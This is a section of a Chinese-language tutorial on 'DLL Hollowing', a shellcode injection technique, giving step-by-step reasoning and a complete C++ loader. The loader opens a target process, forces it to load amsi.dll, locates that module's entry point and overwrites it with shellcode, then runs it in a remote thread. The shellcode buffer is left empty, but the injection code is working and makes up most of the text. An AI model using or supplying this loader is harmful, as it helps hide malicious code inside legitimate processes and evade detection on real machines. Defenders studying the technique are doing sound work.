9、DLL镂空注入
- 模块镂空(DLL Hollowing)是一种Shellcode注入技术,它借鉴了进程镂空(Process Hollowing)的原理和思路。
- 实现思路
- 确定要注入的目标进程:根据进程ID打开目标进程,获取其句柄(示例代码中的进程ID固定为2924,实际应用中可能需要根据需求进行调整)。
- 将合法的DLL(如amsi.dll)注入目标进程:通过
VirtualAllocEx和WriteProcessMemory将DLL名称写入远程进程的内存空间。然后,获取LoadLibraryW函数的地址,并在远程进程中创建一个新线程以调用该函数,实现DLL的加载。
- 确定注入的DLL在目标进程中的基址:使用
EnumProcessModules函数遍历目标进程中加载的所有模块,找到已注入的合法DLL(如amsi.dll)的基址。
- 获取DLL的入口点:读取注入的DLL的PE头部信息,包括DOS头部和NT头部,从中获取DLL的入口点(AddressOfEntryPoint),并计算在目标进程中的实际地址。
- 向DLL的入口点写入Shellcode:使用
WriteProcessMemory将Shellcode写入目标进程的DLL入口点。
- 执行Shellcode:在目标进程中创建一个新线程,以DLL的入口点作为线程的起始地址,从而在镂空的DLL内部执行Shellcode
9.1、实现代码
#include<windows.h>
#include<stdio.h>
unsigned char shellcode[] = "";
int main() {
TCHAR ModuleName[] = L"C:\\windows\\system32\\amsi.dll"; //定义要注入的合法DLL的文件路径
HMODULE hModules[256] = {}; //定义一个数组用于存储目标进程中加载的模块的句柄
SIZE_T hModulesSize = sizeof(hModules); //计算存储模块句柄数组的大小
DWORD hModulesSizeNeeded = 0; //用于存储EnumProcessModules函数返回的实际需要的缓冲区大小
DWORD moduleNameSize = 0; //定义变量用于存储模块名称的大小(未使用)
SIZE_T hModulesCount = 0; //计算目标进程中模块的数量
CHAR rModuleName[128] = {}; //定义一个字符数组用于存储远程模块的名称
HMODULE rModule = NULL; //定义一个变量用于存储找到的远程模块的句柄
// 以可读写权限打开目标进程
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 31652);
// 在远程进程中分配内存并写入待注入DLL的路径
LPVOID lprBuffer = VirtualAllocEx(hProcess, NULL, sizeof ModuleName, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, lprBuffer, (LPVOID)ModuleName, sizeof ModuleName, NULL);
// 获取LoadLibraryW函数的地址,用于在远程进程中加载DLL
PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
// 创建远程线程以加载DLL
HANDLE dllThread = CreateRemoteThread(hProcess, NULL, 0, threadRoutine, lprBuffer, 0, NULL);
// 等待远程线程加载完DLL
WaitForSingleObject(dllThread, 1000);
// 找到在远程进程中注入的DLL的基地址
EnumProcessModules(hProcess, hModules, hModulesSize, &hModulesSizeNeeded);
hModulesCount = hModulesSizeNeeded / sizeof(HMODULE);
for (size_t i = 0; i < hModulesCount; i++)
{
rModule = hModules[i];
GetModuleBaseNameA(hProcess, rModule, rModuleName, sizeof(rModuleName));
if (std::string(rModuleName).compare("amsi.dll") == 0)
{
break;
}
}
// 获取DLL的AddressOfEntryPoint
DWORD headerBufferSize = 0x1000;
LPVOID peHeader = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
ReadProcessMemory(hProcess, rModule, peHeader, headerBufferSize, NULL);
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peHeader;
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)peHeader + dosHeader->e_lfanew);
LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)rModule);
// 将Shellcode写入DLL的AddressOfEntryPoint
WriteProcessMemory(hProcess, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);
// 从注入的DLL中执行Shellcode
CreateRemoteThread(hProcess, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);
return 0;
}
